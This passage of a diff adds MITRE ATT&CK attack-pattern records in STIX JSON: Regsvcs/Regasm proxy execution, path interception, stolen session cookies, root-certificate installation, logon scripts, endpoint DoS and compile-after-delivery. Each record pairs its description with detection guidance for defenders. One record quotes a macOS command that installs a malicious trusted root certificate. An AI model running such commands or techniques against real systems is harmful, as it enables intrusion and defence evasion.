"modified": "2022-05-11T14:00:00.188Z", + "name": "Regsvcs/Regasm", + "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Casey Smith" + ], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application control" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "created": "2020-01-23T19:42:16.439Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/009", + "external_id": "T1218.009" + }, + { + "source_name": "MSDN Regsvcs", + "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/04za0hca.aspx" + }, + { + "source_name": "MSDN Regasm", + "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx" + }, + { + "source_name": "LOLBAS Regsvcs", + "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/" + }, + { + "source_name": "LOLBAS Regasm", + "description": "LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regasm/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-01-27T14:49:39.188Z", + "name": "Path Interception", + "description": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**\n\nPath interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)\n\nThere are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.\n\n### Unquoted Paths\nService paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)\n\n### PATH Environment Variable Misconfiguration\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.\n\n### Search Order Hijacking\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak" + ], + "x_mitre_deprecated": true, + "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. \n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "User", + "Administrator", + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02", + "created": "2017-05-31T21:30:36.140Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1034", + "external_id": "T1034" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/159.html", + "external_id": "CAPEC-159" + }, + { + "source_name": "TechNet MS14-019", + "description": "Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking via .cmd or .bat file. Retrieved July 25, 2016.", + "url": "https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/" + }, + { + "source_name": "Microsoft Subkey", + "description": "Microsoft. (n.d.). CurrentControlSet\\Services Subkey Entries. Retrieved November 30, 2014.", + "url": "http://support.microsoft.com/KB/103000" + }, + { + "source_name": "Baggett 2012", + "description": "Baggett, M. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved December 4, 2014.", + "url": "https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464" + }, + { + "source_name": "SecurityBoulevard Unquoted Services APR 2018", + "description": "HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.", + "url": "https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/" + }, + { + "source_name": "SploitSpren Windows Priv Jan 2018", + "description": "McFarland, R. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.", + "url": "https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/" + }, + { + "source_name": "Microsoft CreateProcess", + "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/ms682425" + }, + { + "source_name": "Hill NT Shell", + "description": "Hill, T. (n.d.). Windows NT Command Shell. Retrieved December 5, 2014.", + "url": "http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120" + }, + { + "source_name": "Microsoft WinExec", + "description": "Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/ms687393" + }, + { + "source_name": "MSDN Environment Property", + "description": "Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Web Session Cookie", + "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary then imports the cookie into a browser they control and is able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Johann Rehberger" + ], + "x_mitre_detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Office 365", + "SaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Logon Credentials", + "Multi-Factor Authentication" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c5e31fb5-fcbd-48a4-af8c-5a6ed5b932e5", + "created": "2019-10-08T20:08:56.205Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1506", + "external_id": "T1506" + }, + { + "source_name": "Pass The Cookie", + "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", + "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html" + }, + { + "source_name": "Unit 42 Mac Crypto Cookies January 2019", + "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:10.768Z", + "name": "Screen Capture", + "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0852", + "external_id": "T0852" + }, + { + "source_name": "ICS-CERT October 2017", + "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-04T20:01:27.662Z", + "name": "Install Root Certificate", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Graeber, @mattifestation, SpecterOps", + "Red Canary", + "Travis Smith, Tripwire", + "Itzik Kotler, SafeBreach" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "created": "2020-02-21T21:05:32.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1553/004", + "external_id": "T1553.004" + }, + { + "source_name": "Operation Emmental", + "description": "botconf eu. (2014, December 31). David Sancho - Finding Holes in Banking 2FA: Operation Emmental. Retrieved January 4, 2024.", + "url": "https://www.youtube.com/watch?v=gchKFumYHWc" + }, + { + "source_name": "SpectorOps Code Signing Dec 2017", + "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", + "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec" + }, + { + "source_name": "Kaspersky Superfish", + "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.", + "url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/" + }, + { + "source_name": "objective-see ay mami 2018", + "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.", + "url": "https://objective-see.com/blog/blog_0x26.html" + }, + { + "source_name": "Microsoft Sigcheck May 2017", + "description": "Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sigcheck" + }, + { + "source_name": "Tripwire AppUNBlocker", + "description": "Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.", + "url": "https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/" + }, + { + "source_name": "Wikipedia Root Certificate", + "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.", + "url": "https://en.wikipedia.org/wiki/Root_certificate" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Network Logon Script", + "description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", + "created": "2020-01-10T18:01:03.666Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1037/003", + "external_id": "T1037.003" + }, + { + "source_name": "Petri Logon Script AD", + "description": "Daniel Petri. (2009, January 8). Setting up a Logon Script through Active Directory Users and Computers in Windows Server 2008. Retrieved November 15, 2019.", + "url": "https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Endpoint Denial of Service", + "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Alfredo Oliveira, Trend Micro", + "David Fiser, @anu4is, Trend Micro", + "Magno Logan, @magnologan, Trend Micro", + "Vishwas Manral, McAfee", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "created": "2019-04-18T11:00:55.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1499", + "external_id": "T1499" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + }, + { + "source_name": "FSISAC FraudNetDoS September 2012", + "description": "FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.", + "url": "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf" + }, + { + "source_name": "ArsTechnica Great Firewall of China", + "description": "Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019.", + "url": "https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/" + }, + { + "source_name": "FireEye OpPoisonedHandover February 2016", + "description": "Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" + }, + { + "source_name": "USNYAG IranianBotnet March 2016", + "description": "Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.", + "url": "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged" + }, + { + "source_name": "Symantec DDoS October 2014", + "description": "Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Compile After Delivery", + "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian", + "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank" + ], + "x_mitre_detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Signature-based detection", + "Host intrusion prevention systems", + "Anti-virus", + "Binary Analysis", + "Static File Analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_system_requirements": [ + "Compiler software 